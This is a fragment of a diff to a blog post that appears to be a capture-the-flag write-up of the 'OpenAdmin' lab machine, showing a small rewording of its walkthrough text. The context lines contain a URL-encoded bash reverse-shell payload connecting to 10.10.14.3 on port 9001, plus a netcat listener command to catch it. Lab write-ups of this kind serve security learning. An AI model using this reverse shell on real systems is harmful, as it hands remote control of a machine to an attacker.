0xsyr0/jekyll-theme-chirpy/_posts/2020-11-06-openadmin.md

 %62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%33%2f%39%30%30%31%20%30%3e%26%31%27
 ```

-At this point we have to start a netcat listener on our desired port, then enter
+Now we have to start a netcat listener on our desired port, then enter the url encoded
-the url encoded string to our shell to get the reverse shell.
+string to our shell to get the reverse shell.

 ```bash
 $ nc -lnvp 9001